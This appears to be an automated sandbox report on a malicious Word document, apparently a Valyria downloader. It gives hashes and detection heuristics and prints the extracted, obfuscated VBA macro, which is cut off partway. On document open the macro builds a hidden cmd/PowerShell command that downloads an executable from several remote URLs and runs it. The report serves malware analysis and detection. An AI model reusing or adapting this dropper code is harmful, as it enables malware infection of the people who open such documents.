Office (OLE) malware analysis — malicious · b25e368a8bf33319

MALICIOUS

Office (OLE)

65.2 KB Created: 2018-09-07 12:17:00 Authoring application: Microsoft Office Word First seen: 2018-10-13

MD5: 87ddc3ec89689eb80ed18b05668c5fff SHA-1: 8aa62182fc4f19b976fb477b95ab8772081bed39 SHA-256: b25e368a8bf33319e0c4b5db1c8a5af79dd11b934a07590c0f7b53d50b593341

182 Risk Score

Heuristics 5

ClamAV: Doc.Downloader.Valyria-6680503-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6680503-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6368 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6368 bytes
SHA-256: `d8b73d7156faaaac83e6ee7ebcbb8be6fee073a86f32d77cce1514647b4dcad9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "pOlzJBnj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Month Format("nzjwpKsH" + "50763285") Month Format("41794960" + "UtDt") Month Format("BnhcaDPXi" + "ThQZW") Month Format("1531" + "3197" + "437203224" + "p") Month Format("122716515" + "IOkoqqcazt" + "DEzIKIUMuR" + "7471") Month Format("bM" + "397" + "c" + "XprIvPoF") Month Format("w" + "1256") Shell Format(PYirZb) + Format(hjZjWhEtKZUQkO) + Format(IRMrLqqwFWnV) + BdlqqjcScoE + aAfWfijpC + jDLtWTikDKH + Format(WkquHkmjrXT) + Format(nChMQICjkA), Format(vbHide) Month Format("151282391" + "nijdEQwz" + "RF" + "128903440") Month Format("SPHCMhiKpU" + "6031" + "498354437" + "ih") End Sub Attribute VB_Name = "OvmkoBU" Function BdlqqjcScoE() On _ Error _ Resume _ Next Month Format("268733694" + "374424021") jJbobkHFw = Chr(2 + 11 + 13 + 4 + 69) + "md" + " /V^:O" + "N/" + Chr(1 + 7 + 9 + 3 + 47) + Chr(0 + 3 + 4 + 1 + 26) + "^s" + "^et" + " ^7" Month Format("birwilf" + "210329392") Month Format("NDjGDs" + "KJM" + "22398530" + "t") Month Format("V" + "VofPHuwCGkjXrM") Month Format("nmKw" + "3363") tVwoP = Chr(2 + 11 + 13 + 4 + 69) + "W^" + "F" + "= ^" + " " + "^ " + " ^ ^ " Month Format("410026639" + "CLujU") Month Format("SHjA" + "148441006" + "MJ" + "2196") Month Format("lrFMsWOkN" + "6602642" + "8365" + "YLMK") LjzRsjm = " ^ " + "^ ^ " + "^ }" + "}^" + "{h" + Chr(2 + 11 + 13 + 4 + 69) + "t^" Month Format("451358977" + "FVfRrs") Month Format("2089" + "6622") YssqGAfcs = "a" + Chr(2 + 11 + 13 + 4 + 69) + "^};k" + "a^er^b;" + "q^Zk" + "^" + "$ " + "^me" + "t^I-" + "^ekov" + "n" + "I;)" Month Format("7826" + "N" + "GnojtzlvzfL" + "F") Month Format("DkIW" + "ckznNs") Month Format("9082" + "1899") Month Format("JVXv" + "G") njOhjzfz = "^q^" + "Z" + "^k$^ ,^" + "s^" + "oW$(" + "^el^i" Month Format("FYWdNpNlQdkKwu" + "9026") Month Format("G" + "bzjAlJPwFbi" + "YoA" + "399081206") Month Format("W" + "YG" + "uuW" + "Pt") Month Format("2097" + "bKkZmXp") KYAJJwvwboN = "^F^d^a" + "oln^wo" + "^D.XNI^" + "$^{y" + "r^t{)^T" + "G" + "O$^ n" + "i so^W^" + "$(" + "h" + Chr(2 + 11 + 13 + 4 + 69) + "^a" + "^erof;" + "'e^x^e" Month Format("popw" + "GZTiIIViUjwjjj") Month Format("4217" + "9077" + "313564410" + "5306") DOwJmO = "^.'+p^A" + "S^$^" + "+'^\'+" + Chr(2 + 11 + 13 + 4 + 69) + "i" + "l^b^" + "u" + "p:v" + "n^e^$=^" + "q^Zk$" + ";'^" Month Format("5335" + "5222") sQCLzozSwI = "282'" + "^" + " ^=^ p" + "^A^S$" + "^;" Month Format("mPHIX" + "Nq") Month Format("KwBa" + "rJlo" + "FTF" + "wR") Month Format("280131626" + "PiAKrUlihSabR") Month Format("h" + "rLu" + "Ia" + "EtLEd") Month Format("UjflI" + "349445532") GrVjzMT = ")'@'(^t" + "^ilpS." + "^'^9" + "^3" + "/^ur^.n" + "n^" + "o" + "v" + "^o^k^" + "i^l" + "u^k//^:" + "^pt" + "t^h@6" BdlqqjcScoE = jJbobkHFw + tVwoP + LjzRsjm + YssqGAfcs + njOhjzfz + KYAJJwvwboN + DOwJmO + sQCLzozSwI + GrVjzMT Month Format("152377685" + "478189144" + "hjIoQiPD" + "C") End Function Function aAfWfijpC() On _ Error _ Resume _ Next Month Format("8371" + "pz" + "biFo" + "WrdEnGiw") Month Format("olhNiXjJP" + "428608724" + "niMKtsbsiddjj" + "99561868") Month Format("NCjfJGu" + "357532045") Month Format("MjlA" + "OlBoCfLjC") ItHkwJbVQ = "/ur" + "^.ika" + "^b-^otv" + "^a//^" + ":p^t" + "^th@^0" + "/^m^o" + Chr(2 + 11 + 13 + 4 + 69) + "^.xu" + "n^i^l" + "m" + "^o//:" + "^ptth@" Month Format("bQlZnjmjDQmtf" + "aUVjsZvZt" + "362758673" + "G") Month Format("zhbRYEL" + "HdnArYVVmXNs" + "GjUl" + "mQKZZ") Month Format("qSQn" + "580") Month Format("6999" + "hNQTAFFqusX" + "507547001" + "hjp") Month Format("5176" + "lG" + "s" + "1724") lIEoGRrC = "tvpPQ^" + "W^5h" + "/k^s.r^" + "e^ll" + "i^" + "m^-^h" + Chr(2 ... (truncated)

SHA-256: d8b73d7156faaaac83e6ee7ebcbb8be6fee073a86f32d77cce1514647b4dcad9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "pOlzJBnj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Month Format("nzjwpKsH" + "50763285")
   Month Format("41794960" + "UtDt")
   Month Format("BnhcaDPXi" + "ThQZW")
   Month Format("1531" + "3197" + "437203224" + "p")
   Month Format("122716515" + "IOkoqqcazt" + "DEzIKIUMuR" + "7471")
   Month Format("bM" + "397" + "c" + "XprIvPoF")
   Month Format("w" + "1256")
Shell Format(PYirZb) + Format(hjZjWhEtKZUQkO) + Format(IRMrLqqwFWnV) + BdlqqjcScoE + aAfWfijpC + jDLtWTikDKH + Format(WkquHkmjrXT) + Format(nChMQICjkA), Format(vbHide)
   Month Format("151282391" + "nijdEQwz" + "RF" + "128903440")
   Month Format("SPHCMhiKpU" + "6031" + "498354437" + "ih")
End Sub



Attribute VB_Name = "OvmkoBU"
Function BdlqqjcScoE()

On _
Error _
Resume _
Next
Month Format("268733694" + "374424021")
jJbobkHFw = Chr(2 + 11 + 13 + 4 + 69) + "md" + " /V^:O" + "N/" + Chr(1 + 7 + 9 + 3 + 47) + Chr(0 + 3 + 4 + 1 + 26) + "^s" + "^et" + " ^7"
Month Format("birwilf" + "210329392")
   Month Format("NDjGDs" + "KJM" + "22398530" + "t")
   Month Format("V" + "VofPHuwCGkjXrM")
   Month Format("nmKw" + "3363")
tVwoP = Chr(2 + 11 + 13 + 4 + 69) + "W^" + "F" + "=  ^" + " " + "^ " + " ^  ^ "
Month Format("410026639" + "CLujU")
   Month Format("SHjA" + "148441006" + "MJ" + "2196")
   Month Format("lrFMsWOkN" + "6602642" + "8365" + "YLMK")
LjzRsjm = "  ^  " + "^ ^   " + "^ }" + "}^" + "{h" + Chr(2 + 11 + 13 + 4 + 69) + "t^"
Month Format("451358977" + "FVfRrs")
   Month Format("2089" + "6622")
YssqGAfcs = "a" + Chr(2 + 11 + 13 + 4 + 69) + "^};k" + "a^er^b;" + "q^Zk" + "^" + "$ " + "^me" + "t^I-" + "^ekov" + "n" + "I;)"
Month Format("7826" + "N" + "GnojtzlvzfL" + "F")
   Month Format("DkIW" + "ckznNs")
   Month Format("9082" + "1899")
   Month Format("JVXv" + "G")
njOhjzfz = "^q^" + "Z" + "^k$^ ,^" + "s^" + "oW$(" + "^el^i"
Month Format("FYWdNpNlQdkKwu" + "9026")
   Month Format("G" + "bzjAlJPwFbi" + "YoA" + "399081206")
   Month Format("W" + "YG" + "uuW" + "Pt")
   Month Format("2097" + "bKkZmXp")
KYAJJwvwboN = "^F^d^a" + "oln^wo" + "^D.XNI^" + "$^{y" + "r^t{)^T" + "G" + "O$^ n" + "i so^W^" + "$(" + "h" + Chr(2 + 11 + 13 + 4 + 69) + "^a" + "^erof;" + "'e^x^e"
Month Format("popw" + "GZTiIIViUjwjjj")
   Month Format("4217" + "9077" + "313564410" + "5306")
DOwJmO = "^.'+p^A" + "S^$^" + "+'^\'+" + Chr(2 + 11 + 13 + 4 + 69) + "i" + "l^b^" + "u" + "p:v" + "n^e^$=^" + "q^Zk$" + ";'^"
Month Format("5335" + "5222")
sQCLzozSwI = "282'" + "^" + " ^=^ p" + "^A^S$" + "^;"
Month Format("mPHIX" + "Nq")
   Month Format("KwBa" + "rJlo" + "FTF" + "wR")
   Month Format("280131626" + "PiAKrUlihSabR")
   Month Format("h" + "rLu" + "Ia" + "EtLEd")
   Month Format("UjflI" + "349445532")
GrVjzMT = ")'@'(^t" + "^ilpS." + "^'^9" + "^3" + "/^ur^.n" + "n^" + "o" + "v" + "^o^k^" + "i^l" + "u^k//^:" + "^pt" + "t^h@6"
BdlqqjcScoE = jJbobkHFw + tVwoP + LjzRsjm + YssqGAfcs + njOhjzfz + KYAJJwvwboN + DOwJmO + sQCLzozSwI + GrVjzMT
   Month Format("152377685" + "478189144" + "hjIoQiPD" + "C")
End Function
Function aAfWfijpC()

On _
Error _
Resume _
Next
Month Format("8371" + "pz" + "biFo" + "WrdEnGiw")
   Month Format("olhNiXjJP" + "428608724" + "niMKtsbsiddjj" + "99561868")
   Month Format("NCjfJGu" + "357532045")
   Month Format("MjlA" + "OlBoCfLjC")
ItHkwJbVQ = "/ur" + "^.ika" + "^b-^otv" + "^a//^" + ":p^t" + "^th@^0" + "/^m^o" + Chr(2 + 11 + 13 + 4 + 69) + "^.xu" + "n^i^l" + "m" + "^o//:" + "^ptth@"
Month Format("bQlZnjmjDQmtf" + "aUVjsZvZt" + "362758673" + "G")
   Month Format("zhbRYEL" + "HdnArYVVmXNs" + "GjUl" + "mQKZZ")
   Month Format("qSQn" + "580")
   Month Format("6999" + "hNQTAFFqusX" + "507547001" + "hjp")
   Month Format("5176" + "lG" + "s" + "1724")
lIEoGRrC = "tvpPQ^" + "W^5h" + "/k^s.r^" + "e^ll" + "i^" + "m^-^h" + Chr(2 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.